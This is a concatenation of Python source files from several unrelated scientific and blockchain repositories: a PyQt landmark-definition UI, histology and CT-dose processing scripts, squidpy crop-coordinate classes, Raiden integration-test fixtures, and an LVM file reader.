self.gridLayout.addWidget(self.Text_Filename, 1, 0, 1, 1)
self.gridLayout_2.addWidget(self.groupBox_2, 0, 1, 1, 1)
self.verticalLayout = QtWidgets.QVBoxLayout()
self.verticalLayout.setObjectName("verticalLayout")
self.groupBox_autodetect = QtWidgets.QGroupBox(self.centralwidget)
self.groupBox_autodetect.setMinimumSize(QtCore.QSize(215, 0))
self.groupBox_autodetect.setObjectName("groupBox_autodetect")
self.gridLayout_4 = QtWidgets.QGridLayout(self.groupBox_autodetect)
self.gridLayout_4.setObjectName("gridLayout_4")
self.label_4 = QtWidgets.QLabel(self.groupBox_autodetect)
self.label_4.setObjectName("label_4")
self.gridLayout_4.addWidget(self.label_4, 0, 0, 1, 1)
self.d_SourceDetector = QtWidgets.QDoubleSpinBox(self.groupBox_autodetect)
self.d_SourceDetector.setDecimals(1)
self.d_SourceDetector.setMaximum(400.0)
self.d_SourceDetector.setObjectName("d_SourceDetector")
self.gridLayout_4.addWidget(self.d_SourceDetector, 0, 1, 1, 1)
self.label_6 = QtWidgets.QLabel(self.groupBox_autodetect)
self.label_6.setObjectName("label_6")
self.gridLayout_4.addWidget(self.label_6, 0, 2, 1, 1)
self.label_5 = QtWidgets.QLabel(self.groupBox_autodetect)
self.label_5.setObjectName("label_5")
self.gridLayout_4.addWidget(self.label_5, 1, 0, 1, 1)
self.d_ObjectDetector = QtWidgets.QDoubleSpinBox(self.groupBox_autodetect)
self.d_ObjectDetector.setDecimals(1)
self.d_ObjectDetector.setMaximum(400.0)
self.d_ObjectDetector.setObjectName("d_ObjectDetector")
self.gridLayout_4.addWidget(self.d_ObjectDetector, 1, 1, 1, 1)
self.label_7 = QtWidgets.QLabel(self.groupBox_autodetect)
self.label_7.setObjectName("label_7")
self.gridLayout_4.addWidget(self.label_7, 1, 2, 1, 1)
self.LabelPixSpace = QtWidgets.QLabel(self.groupBox_autodetect)
self.LabelPixSpace.setObjectName("LabelPixSpace")
self.gridLayout_4.addWidget(self.LabelPixSpace, 2, 0, 1, 3)
self.Button_accptPxSpace = QtWidgets.QPushButton(self.groupBox_autodetect)
self.Button_accptPxSpace.setObjectName("Button_accptPxSpace")
self.gridLayout_4.addWidget(self.Button_accptPxSpace, 3, 0, 1, 3)
self.verticalLayout.addWidget(self.groupBox_autodetect)
self.groupBox = QtWidgets.QGroupBox(self.centralwidget)
self.groupBox.setObjectName("groupBox")
self.gridLayout_3 = QtWidgets.QGridLayout(self.groupBox)
self.gridLayout_3.setObjectName("gridLayout_3")
self.Button_defineROI = QtWidgets.QPushButton(self.groupBox)
self.Button_defineROI.setEnabled(True)
self.Button_defineROI.setCheckable(True)
self.Button_defineROI.setChecked(False)
self.Button_defineROI.setFlat(False)
self.Button_defineROI.setObjectName("Button_defineROI")
self.gridLayout_3.addWidget(self.Button_defineROI, 0, 0, 1, 2)
self.Button_lockEarpin = QtWidgets.QPushButton(self.groupBox)
self.Button_lockEarpin.setEnabled(True)
self.Button_lockEarpin.setObjectName("Button_lockEarpin")
self.gridLayout_3.addWidget(self.Button_lockEarpin, 0, 2, 1, 2)
self.label_9 = QtWidgets.QLabel(self.groupBox)
self.label_9.setObjectName("label_9")
self.gridLayout_3.addWidget(self.label_9, 1, 0, 1, 1)
self.TxtEarpinX = QtWidgets.QDoubleSpinBox(self.groupBox)
self.TxtEarpinX.setDecimals(1)
self.TxtEarpinX.setMaximum(10000.0)
self.TxtEarpinX.setSingleStep(0.1)
self.TxtEarpinX.setObjectName("TxtEarpinX")
self.gridLayout_3.addWidget(self.TxtEarpinX, 1, 1, 1, 1)
self.label_10 = QtWidgets.QLabel(self.groupBox)
self.label_10.setObjectName("label_10")
self.gridLayout_3.addWidget(self.label_10, 1, 2, 1, 1)
self.TxtEarpinY = QtWidgets.QDoubleSpinBox(self.groupBox)
self.TxtEarpinY.setDecimals(1)
self.TxtEarpinY.setMaximum(10000.0)
self.TxtEarpinY.setSingleStep(0.1)
self.TxtEarpinY.setObjectName("TxtEarpinY")
self.gridLayout_3.addWidget(self.TxtEarpinY, 1, 3, 1, 1)
self.verticalLayout.addWidget(self.groupBox)
self.Button_Done = QtWidgets.QPushButton(self.centralwidget)
self.Button_Done.setObjectName("Button_Done")
self.verticalLayout.addWidget(self.Button_Done)
spacerItem = QtWidgets.QSpacerItem(20, 40, QtWidgets.QSizePolicy.Minimum, QtWidgets.QSizePolicy.Expanding)
self.verticalLayout.addItem(spacerItem)
self.gridLayout_2.addLayout(self.verticalLayout, 1, 1, 1, 1)
Landmark.setCentralWidget(self.centralwidget)
self.menubar = QtWidgets.QMenuBar(Landmark)
self.menubar.setGeometry(QtCore.QRect(0, 0, 787, 26))
self.menubar.setObjectName("menubar")
Landmark.setMenuBar(self.menubar)
self.statusbar = QtWidgets.QStatusBar(Landmark)
self.statusbar.setObjectName("statusbar")
Landmark.setStatusBar(self.statusbar)
self.retranslateUi(Landmark)
QtCore.QMetaObject.connectSlotsByName(Landmark)
def retranslateUi(self, Landmark):
_translate = QtCore.QCoreApplication.translate
Landmark.setWindowTitle(_translate("Landmark", "Landmark Definition"))
self.groupBox_2.setTitle(_translate("Landmark", "GroupBox"))
self.Button_LoadLandmark.setText(_translate("Landmark", "Load Landmark Image"))
self.groupBox_autodetect.setTitle(_translate("Landmark", "Pixel Spacing"))
self.label_4.setText(_translate("Landmark", "<html><head/><body><p>Source-Detector: d<span style=\" vertical-align:sub;\">SD </span>=</p></body></html>"))
self.label_6.setText(_translate("Landmark", "cm"))
self.label_5.setText(_translate("Landmark", "<html><head/><body><p>Object-Detector: d<span style=\" vertical-align:sub;\">OD</span> =</p></body></html>"))
self.label_7.setText(_translate("Landmark", "cm"))
self.LabelPixSpace.setText(_translate("Landmark", "Pixel Spacing:"))
self.Button_accptPxSpace.setText(_translate("Landmark", "Lock"))
self.groupBox.setTitle(_translate("Landmark", "Earpin"))
self.Button_defineROI.setText(_translate("Landmark", "Define ROI"))
self.Button_lockEarpin.setText(_translate("Landmark", "Lock"))
self.label_9.setText(_translate("Landmark", "x="))
self.label_10.setText(_translate("Landmark", "y="))
self.Button_Done.setText(_translate("Landmark", "Done"))
from matplotlibwidgetFile import matplotlibWidget
```
#### File: RadiAide/tests/test_radiaidd.py
```python
import RadiAIDD
def test_radiaidd():
a = 1 + 1
assert(a == 2)
if __name__ == "__main__":
test_radiaidd()
``` |
{
"source": "jo-mueller/Slice2Volume_CodeAndDocs",
"score": 3
} |
#### File: Histology/Scripts/SortHistoSlices.py
```python
import os
import tqdm
from itertools import chain
from shutil import copyfile
import re
def parsename(string):
"Extracts propper dirname from histo filename"
substrings = re.split("-|_|\.", string)
for i in range(len(substrings)):
if substrings[i] == "Scene":
break
SliceNumber = substrings[i-1]
try:
SceneNumber = substrings[i+1]
except Exception.IndexError:
print("Script failed here:")
print(substrings)
return "_".join([SliceNumber, "Scene", SceneNumber])
root = "E:/Promotion/Projects/2020_Slice2Volume/Data/"
mouselist = os.listdir(root)
for mouse in mouselist:
print(mouse)
if not mouse == "P2A_C3H_M5":
continue
if not os.path.exists(os.path.join(root, mouse, "Histo")):
continue
print("Sorting data for mouse " + mouse)
dirlist = os.listdir(os.path.join(root, mouse, "Histo"))
histolist = [d for d in dirlist if not "Scene" in d and not d.endswith("czi")]
slicelist = os.listdir(os.path.join(root, mouse, "Histo", histolist[0]))
# make directories
for i in range(len(slicelist)):
if not "Scene" in slicelist[i]:
continue
name = parsename(slicelist[i])
trgpath = os.path.join(root, mouse, "Histo", name)
if not os.path.isdir(trgpath):
os.mkdir(trgpath)
# Now that all folders are created, data to correct location
histolist = [os.path.join(root, mouse, "Histo", x) for x in histolist]
for base, subdirs, files in chain.from_iterable(os.walk(x) for x in histolist):
# Skip empty directories
if len(files) == 0:
continue
for f in tqdm.tqdm(files):
# Skip this blasted file
if f == "Thumbs.db":
continue
parsedname = parsename(f)
# propper fileformatting
img_type = (''.join([x[0] for x in os.path.basename(base).split('-')]) +
"_" + os.path.basename(base).replace("-", "_"))
src = os.path.join(base, f)
_f = f.replace('-', '_').split('_')
_f = '_'.join(_f[0:4] + [img_type] + _f[4:])
trg = os.path.join(root, mouse, "Histo", parsedname, _f)
if os.path.exists(trg):
continue
copyfile(src, trg)
```
#### File: Slice2Volume_CodeAndDocs/Simulation/zeropadding.py
```python
import os
import numpy as np
import pydicom as dcm
import tqdm
import random
import tifffile as tf
def read_CT(directory):
"""
Read dcm files from a directory and fuse to array
"""
# get CBCT data
slices = os.listdir(directory)
meta = dcm.read_file(os.path.join(directory, slices[0]))
Array = np.zeros((meta.Rows, meta.Columns, len(slices)))
for i, slc in tqdm.tqdm(enumerate(slices)):
meta = dcm.read_file(os.path.join(directory, slc))
Array[:, :, i] = meta.pixel_array
return Array
"""
BL6:
Maus CTAuswahlMitte CTAuswahlMitte-45 CTAuswahlMitte+45
---- ------------------ ------------------ ------------------
1 98 53 143
2 89 44 134
6 97 52 142
10 97 52 142
C3H:
Maus CTAuswahlMitte CTAuswahlMitte-45 CTAuswahlMitte+45
---- ------------------ ------------------ ------------------
1 122 77 167
3 116 71 161
5 118 73 163
8 130 85 175
10 128 83 173
"""
first = 83 # first simulated axial slice
N_slices = 91 # number of simulated axial slices
if __name__ == '__main__':
root = r"E:\Promotion\Projects\2020_Slice2Volume\Data\P2A_C3H_M10"
CBCT = read_CT(os.path.join(root, "CT"))
Dose = np.zeros_like(CBCT)
LET = np.zeros_like(CBCT)
# Dose first
Doses = []
LETs = []
for base, subdirs, fnames in os.walk(os.path.join(root, "Simulation")):
for fname in fnames:
if fname.endswith("dcm") and "TotalDose" in fname:
Doses.append(os.path.join(base, fname))
elif fname.endswith("dcm") and "ProtonLET" in fname:
LETs.append(os.path.join(base, fname))
# Pick 10 out of the >10 statistically independent experiment runs
Doses = random.sample(Doses, 10)
LETs = random.sample(LETs, 10)
for i in range(len(Doses)):
meta_LET = dcm.read_file(LETs[i])
meta_dose = dcm.read_file(Doses[i])
meta_LET = np.einsum('ijk -> jki', meta_LET.pixel_array) * float(meta_LET.DoseGridScaling)
meta_dose = np.einsum('ijk -> jki', meta_dose.pixel_array) * float(meta_dose.DoseGridScaling)
Dose[:, :, first:first+N_slices] += meta_dose
LET[:, :, first:first+N_slices] += meta_LET
# Average LET
LET = LET/len(LET)
Dose = (Dose - np.min(Dose))/(Dose.max() - Dose.min())
tf.imwrite(os.path.join(root, "Simulation", "Dose.tif"), data=np.einsum('jki -> ijk', Dose))
tf.imwrite(os.path.join(root, "Simulation", "LET.tif"), data=np.einsum('jki -> ijk', LET))
``` |
{
"source": "jo-mueller/squidpy",
"score": 3
} |
#### File: squidpy/im/_coords.py
```python
from __future__ import annotations
from abc import ABC, abstractmethod
from typing import Union # noqa: F401
from typing import Any, Hashable
from dataclasses import dataclass
import numpy as np
from squidpy._utils import NDArrayA
from squidpy.gr._utils import _assert_non_negative
from squidpy._constants._pkg_constants import Key
def _circular_mask(arr: NDArrayA, y: int, x: int, radius: float) -> NDArrayA:
Y, X = np.ogrid[: arr.shape[0], : arr.shape[1]]
return np.asarray(((Y - y) ** 2 + (X - x) ** 2) <= radius**2)
class TupleSerializer(ABC): # noqa: D101
@abstractmethod
def to_tuple(self) -> tuple[float, float, float, float]:
"""Return self as a :class:`tuple`."""
@classmethod
def from_tuple(cls, value: tuple[float, float, float, float]) -> TupleSerializer:
"""Create self from a :class:`tuple`."""
return cls(*value) # type: ignore[call-arg]
@property
@abstractmethod
def T(self) -> TupleSerializer:
"""Transpose self.""" # currently unused
def __mul__(self, other: int | float) -> TupleSerializer:
if not isinstance(other, (int, float)):
return NotImplemented
a, b, c, d = self.to_tuple()
res = type(self)(a * other, b * other, c * other, d * other) # type: ignore[call-arg]
return res
def __rmul__(self, other: int | float) -> TupleSerializer:
return self * other
@dataclass(frozen=True)
class CropCoords(TupleSerializer):
"""Top-left and bottom right-corners of a crop."""
x0: float
y0: float
x1: float
y1: float
def __post_init__(self) -> None:
if self.x0 > self.x1:
raise ValueError(f"Expected `x0` <= `x1`, found `{self.x0}` > `{self.x1}`.")
if self.y0 > self.y1:
raise ValueError(f"Expected `y0` <= `y1`, found `{self.y0}` > `{self.y1}`.")
@property
def T(self) -> CropCoords:
"""Transpose self."""
return CropCoords(x0=self.y0, y0=self.x0, x1=self.y1, y1=self.x1)
@property
def dx(self) -> float:
"""Width."""
return self.x1 - self.x0
@property
def dy(self) -> float:
"""Height."""
return self.y1 - self.y0
@property
def center_x(self) -> float:
"""Center of height."""
return self.x0 + self.dx / 2.0
@property
def center_y(self) -> float:
"""Width of height."""
return self.x0 + self.dy / 2.0
def to_image_coordinates(self, padding: CropPadding) -> CropCoords:
"""
Convert global image coordinates to local.
Parameters
----------
padding
Padding for which to adjust.
Returns
-------
Padding-adjusted image coordinates.
"""
adj = self + padding
return CropCoords(x0=padding.x_pre, y0=padding.y_pre, x1=adj.dx - padding.x_post, y1=adj.dy - padding.y_post)
@property
def slice(self) -> tuple[slice, slice]: # noqa: A003
"""Return the ``(height, width)`` int slice."""
# has to convert to int, because of scaling, coords can also be floats
return slice(int(self.y0), int(self.y1)), slice(int(self.x0), int(self.x1))
def to_tuple(self) -> tuple[float, float, float, float]:
"""Return self as a :class:`tuple`."""
return self.x0, self.y0, self.x1, self.y1
def __add__(self, other: CropPadding) -> CropCoords:
if not isinstance(other, CropPadding):
return NotImplemented
return CropCoords(
x0=self.x0 - other.x_pre, y0=self.y0 - other.y_pre, x1=self.x1 + other.x_post, y1=self.y1 + other.y_post
)
def __sub__(self, other: CropCoords) -> CropPadding:
if not isinstance(other, CropCoords):
return NotImplemented
return CropPadding(
x_pre=abs(self.x0 - other.x0),
y_pre=abs(self.y0 - other.y0),
x_post=abs(self.x1 - other.x1),
y_post=abs(self.y1 - other.y1),
)
@dataclass(frozen=True)
class CropPadding(TupleSerializer):
"""Padding of a crop."""
x_pre: float
x_post: float
y_pre: float
y_post: float
def __post_init__(self) -> None:
_assert_non_negative(self.x_pre, name="x_pre")
_assert_non_negative(self.y_pre, name="y_pre")
_assert_non_negative(self.x_post, name="x_post")
_assert_non_negative(self.y_post, name="y_post")
@property
def T(self) -> CropPadding:
"""Transpose self."""
return CropPadding(x_pre=self.y_pre, y_pre=self.x_pre, x_post=self.y_post, y_post=self.x_post)
def to_tuple(self) -> tuple[float, float, float, float]:
"""Return self as a :class:`tuple`."""
return self.x_pre, self.x_post, self.y_pre, self.y_post
_NULL_COORDS = CropCoords(0, 0, 0, 0)
_NULL_PADDING = CropPadding(0, 0, 0, 0)
# functions for updating attributes with new scaling, CropCoords, CropPadding
def _update_attrs_coords(attrs: dict[Hashable, Any], coords: CropCoords) -> dict[Hashable, Any]:
old_coords = attrs.get(Key.img.coords, _NULL_COORDS)
if old_coords != _NULL_COORDS:
new_coords = CropCoords(
x0=old_coords.x0 + coords.x0,
y0=old_coords.y0 + coords.y0,
x1=old_coords.x0 + coords.x1,
y1=old_coords.y0 + coords.y1,
)
attrs[Key.img.coords] = new_coords
else:
attrs[Key.img.coords] = coords
return attrs
def _update_attrs_scale(attrs: dict[Hashable, Any], scale: int | float) -> dict[Hashable, Any]:
old_scale = attrs[Key.img.scale]
attrs[Key.img.scale] = old_scale * scale
attrs[Key.img.padding] = attrs[Key.img.padding] * scale
attrs[Key.img.coords] = attrs[Key.img.coords] * scale
return attrs
``` |
{
"source": "jomuel/raiden",
"score": 2
} |
#### File: integration/cli/conftest.py
```python
import os
import sys
from copy import copy
from tempfile import mkdtemp
import pexpect
import pytest
from raiden.constants import Environment, EthClient
from raiden.settings import RAIDEN_CONTRACT_VERSION
from raiden.tests.utils.ci import get_artifacts_storage
from raiden.tests.utils.smoketest import setup_raiden, setup_testchain
from raiden.utils.typing import Any, ContextManager, Dict
@pytest.fixture(scope="module")
def cli_tests_contracts_version():
return RAIDEN_CONTRACT_VERSION
@pytest.fixture(scope="module")
def raiden_testchain(blockchain_type, port_generator, cli_tests_contracts_version):
import time
start_time = time.monotonic()
eth_client = EthClient(blockchain_type)
# The private chain data is always discarded on the CI
tmpdir = mkdtemp()
base_datadir = str(tmpdir)
# Save the Ethereum node's logs, if needed for debugging
base_logdir = os.path.join(get_artifacts_storage() or str(tmpdir), blockchain_type)
os.makedirs(base_logdir, exist_ok=True)
testchain_manager: ContextManager[Dict[str, Any]] = setup_testchain(
eth_client=eth_client,
free_port_generator=port_generator,
base_datadir=base_datadir,
base_logdir=base_logdir,
)
with testchain_manager as testchain:
result = setup_raiden(
transport="matrix",
matrix_server="auto",
print_step=lambda x: None,
contracts_version=cli_tests_contracts_version,
eth_client=testchain["eth_client"],
eth_rpc_endpoint=testchain["eth_rpc_endpoint"],
web3=testchain["web3"],
base_datadir=testchain["base_datadir"],
keystore=testchain["keystore"],
)
result["ethereum_nodes"] = testchain["node_executors"]
args = result["args"]
# The setup of the testchain returns a TextIOWrapper but
# for the tests we need a filename
args["password_file"] = args["password_file"].name
print("setup_raiden took", time.monotonic() - start_time)
yield args
@pytest.fixture()
def removed_args():
return None
@pytest.fixture()
def changed_args():
return None
@pytest.fixture()
def cli_args(logs_storage, raiden_testchain, removed_args, changed_args, environment_type):
initial_args = raiden_testchain.copy()
if removed_args is not None:
for arg in removed_args:
if arg in initial_args:
del initial_args[arg]
if changed_args is not None:
for k, v in changed_args.items():
initial_args[k] = v
# This assumes that there is only one Raiden instance per CLI test
base_logfile = os.path.join(logs_storage, "raiden_nodes", "cli_test.log")
os.makedirs(os.path.dirname(base_logfile), exist_ok=True)
args = [
"--gas-price",
"1000000000",
"--no-sync-check",
f"--debug-logfile-path={base_logfile}",
"--routing-mode",
"local",
]
if environment_type == Environment.DEVELOPMENT.value:
args += ["--environment-type", environment_type]
for arg_name, arg_value in initial_args.items():
if arg_name == "sync_check":
# Special case
continue
arg_name_cli = "--" + arg_name.replace("_", "-")
if arg_name_cli not in args:
args.append(arg_name_cli)
if arg_value is not None:
args.append(arg_value)
return args
@pytest.fixture
def raiden_spawner(tmp_path, request):
def spawn_raiden(args):
# Remove any possibly defined `RAIDEN_*` environment variables from outer scope
new_env = {k: copy(v) for k, v in os.environ.items() if not k.startswith("RAIDEN")}
new_env["HOME"] = str(tmp_path)
child = pexpect.spawn(
sys.executable,
["-m", "raiden"] + args,
logfile=sys.stdout,
encoding="utf-8",
env=new_env,
timeout=None,
)
request.addfinalizer(child.close)
return child
return spawn_raiden
```
#### File: integration/fixtures/blockchain.py
```python
import os
import pytest
from web3 import HTTPProvider, Web3
from raiden.constants import GENESIS_BLOCK_NUMBER, EthClient
from raiden.network.proxies.proxy_manager import ProxyManager, ProxyManagerMetadata
from raiden.network.rpc.client import JSONRPCClient
from raiden.tests.utils.eth_node import (
AccountDescription,
EthNodeDescription,
GenesisDescription,
run_private_blockchain,
)
from raiden.tests.utils.network import jsonrpc_services
from raiden.tests.utils.tests import cleanup_tasks
from raiden.utils import privatekey_to_address
from raiden.utils.smart_contracts import deploy_contract_web3
from raiden.utils.typing import TokenAddress
from raiden_contracts.constants import CONTRACT_HUMAN_STANDARD_TOKEN
# pylint: disable=redefined-outer-name,too-many-arguments,unused-argument,too-many-locals
@pytest.fixture
def web3(
blockchain_p2p_ports,
blockchain_private_keys,
blockchain_rpc_ports,
blockchain_type,
blockchain_extra_config,
deploy_key,
private_keys,
account_genesis_eth_balance,
random_marker,
request,
tmpdir,
chain_id,
logs_storage,
):
""" Starts a private chain with accounts funded. """
# include the deploy key in the list of funded accounts
keys_to_fund = sorted(set(private_keys + [deploy_key]))
if blockchain_type not in {client.value for client in EthClient}:
raise ValueError(f"unknown blockchain_type {blockchain_type}")
host = "127.0.0.1"
rpc_port = blockchain_rpc_ports[0]
endpoint = f"http://{host}:{rpc_port}"
web3 = Web3(HTTPProvider(endpoint))
assert len(blockchain_private_keys) == len(blockchain_rpc_ports)
assert len(blockchain_private_keys) == len(blockchain_p2p_ports)
eth_nodes = [
EthNodeDescription(
private_key=key,
rpc_port=rpc,
p2p_port=p2p,
miner=(pos == 0),
extra_config=blockchain_extra_config,
blockchain_type=blockchain_type,
)
for pos, (key, rpc, p2p) in enumerate(
zip(blockchain_private_keys, blockchain_rpc_ports, blockchain_p2p_ports)
)
]
accounts_to_fund = [
AccountDescription(privatekey_to_address(key), account_genesis_eth_balance)
for key in keys_to_fund
]
# The private chain data is always discarded on the CI
base_datadir = str(tmpdir)
# Save the Ethereum node's log for debugging
base_logdir = os.path.join(logs_storage, blockchain_type)
genesis_description = GenesisDescription(
prefunded_accounts=accounts_to_fund, chain_id=chain_id, random_marker=random_marker
)
eth_node_runner = run_private_blockchain(
web3=web3,
eth_nodes=eth_nodes,
base_datadir=base_datadir,
log_dir=base_logdir,
verbosity="info",
genesis_description=genesis_description,
)
with eth_node_runner:
yield web3
cleanup_tasks()
@pytest.fixture
def deploy_client(blockchain_rpc_ports, deploy_key, web3, blockchain_type):
if blockchain_type == "parity":
return JSONRPCClient(web3, deploy_key, gas_estimate_correction=lambda gas: 2 * gas)
return JSONRPCClient(web3, deploy_key)
@pytest.fixture
def proxy_manager(deploy_key, deploy_client, contract_manager):
return ProxyManager(
rpc_client=deploy_client,
contract_manager=contract_manager,
metadata=ProxyManagerMetadata(
token_network_registry_deployed_at=GENESIS_BLOCK_NUMBER,
filters_start_at=GENESIS_BLOCK_NUMBER,
),
)
@pytest.fixture
def blockchain_services(
proxy_manager,
private_keys,
secret_registry_address,
service_registry_address,
token_network_registry_address,
web3,
contract_manager,
):
return jsonrpc_services(
proxy_manager=proxy_manager,
private_keys=private_keys,
secret_registry_address=secret_registry_address,
service_registry_address=service_registry_address,
token_network_registry_address=token_network_registry_address,
web3=web3,
contract_manager=contract_manager,
)
@pytest.fixture
def unregistered_token(token_amount, deploy_client, contract_manager) -> TokenAddress:
return TokenAddress(
deploy_contract_web3(
CONTRACT_HUMAN_STANDARD_TOKEN,
deploy_client,
contract_manager=contract_manager,
constructor_arguments=(token_amount, 2, "raiden", "Rd"),
)
)
```
#### File: integration/fixtures/raiden_network.py
```python
import os
import subprocess
import gevent
import pytest
from raiden.app import App
from raiden.constants import GENESIS_BLOCK_NUMBER, Environment, RoutingMode
from raiden.tests.utils.network import (
CHAIN,
BlockchainServices,
create_all_channels_for_network,
create_apps,
create_network_channels,
create_sequential_channels,
parallel_start_apps,
wait_for_alarm_start,
wait_for_channels,
wait_for_token_networks,
)
from raiden.tests.utils.tests import shutdown_apps_and_cleanup_tasks
from raiden.tests.utils.transport import ParsedURL
from raiden.utils.typing import (
Address,
BlockTimeout,
ChainID,
Iterable,
List,
Optional,
TokenAddress,
TokenAmount,
TokenNetworkRegistryAddress,
)
def timeout(blockchain_type: str) -> float:
"""As parity nodes are slower, we need to set a longer timeout when
waiting for onchain events to complete."""
return 120 if blockchain_type == "parity" else 30
@pytest.fixture
def routing_mode():
return RoutingMode.PRIVATE
@pytest.fixture
def raiden_chain(
token_addresses: List[TokenAddress],
token_network_registry_address: TokenNetworkRegistryAddress,
one_to_n_address: Address,
channels_per_node: int,
deposit: TokenAmount,
settle_timeout: BlockTimeout,
chain_id: ChainID,
blockchain_services: BlockchainServices,
reveal_timeout: BlockTimeout,
retry_interval: float,
retries_before_backoff: int,
environment_type: Environment,
unrecoverable_error_should_crash: bool,
local_matrix_servers: List[ParsedURL],
blockchain_type: str,
contracts_path: str,
user_deposit_address: Address,
monitoring_service_contract_address: Address,
broadcast_rooms: List[str],
logs_storage: str,
routing_mode: RoutingMode,
blockchain_query_interval: float,
resolver_ports: List[Optional[int]],
) -> Iterable[List[App]]:
if len(token_addresses) != 1:
raise ValueError("raiden_chain only works with a single token")
assert channels_per_node in (0, 1, 2, CHAIN), (
"deployed_network uses create_sequential_network that can only work "
"with 0, 1 or 2 channels"
)
base_datadir = os.path.join(logs_storage, "raiden_nodes")
service_registry_address: Optional[Address] = None
if blockchain_services.service_registry:
service_registry_address = blockchain_services.service_registry.address
raiden_apps = create_apps(
chain_id=chain_id,
blockchain_services=blockchain_services.blockchain_services,
token_network_registry_address=token_network_registry_address,
one_to_n_address=one_to_n_address,
secret_registry_address=blockchain_services.secret_registry.address,
service_registry_address=service_registry_address,
user_deposit_address=user_deposit_address,
monitoring_service_contract_address=monitoring_service_contract_address,
reveal_timeout=reveal_timeout,
settle_timeout=settle_timeout,
database_basedir=base_datadir,
retry_interval=retry_interval,
retries_before_backoff=retries_before_backoff,
environment_type=environment_type,
unrecoverable_error_should_crash=unrecoverable_error_should_crash,
local_matrix_url=local_matrix_servers[0],
contracts_path=contracts_path,
broadcast_rooms=broadcast_rooms,
routing_mode=routing_mode,
blockchain_query_interval=blockchain_query_interval,
resolver_ports=resolver_ports,
)
confirmed_block = raiden_apps[0].raiden.confirmation_blocks + 1
blockchain_services.proxy_manager.wait_until_block(target_block_number=confirmed_block)
parallel_start_apps(raiden_apps)
from_block = GENESIS_BLOCK_NUMBER
for app in raiden_apps:
app.raiden.install_all_blockchain_filters(
app.raiden.default_registry, app.raiden.default_secret_registry, from_block
)
exception = RuntimeError("`raiden_chain` fixture setup failed, token networks unavailable")
with gevent.Timeout(seconds=timeout(blockchain_type), exception=exception):
wait_for_token_networks(
raiden_apps=raiden_apps,
token_network_registry_address=token_network_registry_address,
token_addresses=token_addresses,
)
app_channels = create_sequential_channels(raiden_apps, channels_per_node)
create_all_channels_for_network(
app_channels=app_channels,
token_addresses=token_addresses,
channel_individual_deposit=deposit,
channel_settle_timeout=settle_timeout,
)
exception = RuntimeError("`raiden_chain` fixture setup failed, nodes are unreachable")
with gevent.Timeout(seconds=timeout(blockchain_type), exception=exception):
wait_for_channels(
app_channels=app_channels,
token_network_registry_address=blockchain_services.deploy_registry.address,
token_addresses=token_addresses,
deposit=deposit,
)
yield raiden_apps
shutdown_apps_and_cleanup_tasks(raiden_apps)
@pytest.fixture
def monitoring_service_contract_address() -> Address:
return Address(bytes([1] * 20))
@pytest.fixture
def resolvers(resolver_ports):
"""Invoke resolver process for each node having a resolver port
By default, Raiden nodes start without hash resolvers (all ports are None)
"""
resolvers = []
for port in resolver_ports:
resolver = None
if port is not None:
args = ["python", "tools/dummy_resolver_server.py", str(port)]
resolver = subprocess.Popen(args, stdout=subprocess.PIPE)
assert resolver.poll() is None
resolvers.append(resolver)
yield resolvers
for resolver in resolvers:
if resolver is not None:
resolver.terminate()
@pytest.fixture
def raiden_network(
token_addresses: List[TokenAddress],
token_network_registry_address: TokenNetworkRegistryAddress,
one_to_n_address: Address,
channels_per_node: int,
deposit: TokenAmount,
settle_timeout: BlockTimeout,
chain_id: ChainID,
blockchain_services: BlockchainServices,
reveal_timeout: BlockTimeout,
retry_interval: float,
retries_before_backoff: int,
environment_type: Environment,
unrecoverable_error_should_crash: bool,
local_matrix_servers: List[ParsedURL],
blockchain_type: str,
contracts_path: str,
user_deposit_address: Address,
monitoring_service_contract_address: Address,
broadcast_rooms: List[str],
logs_storage: str,
start_raiden_apps: bool,
routing_mode: RoutingMode,
blockchain_query_interval: float,
resolver_ports: List[Optional[int]],
) -> Iterable[List[App]]:
service_registry_address = None
if blockchain_services.service_registry:
service_registry_address = blockchain_services.service_registry.address
base_datadir = os.path.join(logs_storage, "raiden_nodes")
raiden_apps = create_apps(
chain_id=chain_id,
contracts_path=contracts_path,
blockchain_services=blockchain_services.blockchain_services,
token_network_registry_address=token_network_registry_address,
secret_registry_address=blockchain_services.secret_registry.address,
service_registry_address=service_registry_address,
one_to_n_address=one_to_n_address,
user_deposit_address=user_deposit_address,
monitoring_service_contract_address=monitoring_service_contract_address,
reveal_timeout=reveal_timeout,
settle_timeout=settle_timeout,
database_basedir=base_datadir,
retry_interval=retry_interval,
retries_before_backoff=retries_before_backoff,
environment_type=environment_type,
unrecoverable_error_should_crash=unrecoverable_error_should_crash,
local_matrix_url=local_matrix_servers[0],
broadcast_rooms=broadcast_rooms,
routing_mode=routing_mode,
blockchain_query_interval=blockchain_query_interval,
resolver_ports=resolver_ports,
)
confirmed_block = raiden_apps[0].raiden.confirmation_blocks + 1
blockchain_services.proxy_manager.wait_until_block(target_block_number=confirmed_block)
if start_raiden_apps:
parallel_start_apps(raiden_apps)
exception = RuntimeError("`raiden_chain` fixture setup failed, token networks unavailable")
with gevent.Timeout(seconds=timeout(blockchain_type), exception=exception):
wait_for_token_networks(
raiden_apps=raiden_apps,
token_network_registry_address=token_network_registry_address,
token_addresses=token_addresses,
)
app_channels = create_network_channels(raiden_apps, channels_per_node)
create_all_channels_for_network(
app_channels=app_channels,
token_addresses=token_addresses,
channel_individual_deposit=deposit,
channel_settle_timeout=settle_timeout,
)
if start_raiden_apps:
exception = RuntimeError("`raiden_network` fixture setup failed, nodes are unreachable")
with gevent.Timeout(seconds=timeout(blockchain_type), exception=exception):
wait_for_channels(
app_channels=app_channels,
token_network_registry_address=blockchain_services.deploy_registry.address,
token_addresses=token_addresses,
deposit=deposit,
)
# Force blocknumber update
exception = RuntimeError("Alarm failed to start and set up start_block correctly")
with gevent.Timeout(seconds=5, exception=exception):
wait_for_alarm_start(raiden_apps)
yield raiden_apps
shutdown_apps_and_cleanup_tasks(raiden_apps)
``` |
{
"source": "jomy92/lvmPlotter-NTNU-Geotech",
"score": 3
} |
#### File: jomy92/lvmPlotter-NTNU-Geotech/readLVM.py
```python
import numpy as np
import re
def readLVM( filepath ):
# Open and read file
with open( filepath ,'r') as f:
lines = f.readlines()
# Define variables
numbering = []
time = []
mode = []
# Store ID given in file
fileID = lines.pop(0)
# Determine buildup of LVM
for val, id in enumerate(lines):
if '*Header*' in id:
numbering.append(val)
elif '*Calibration data' in id:
numbering.append(val)
elif '\n' == id or '\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\n' == id:
numbering.append(val)
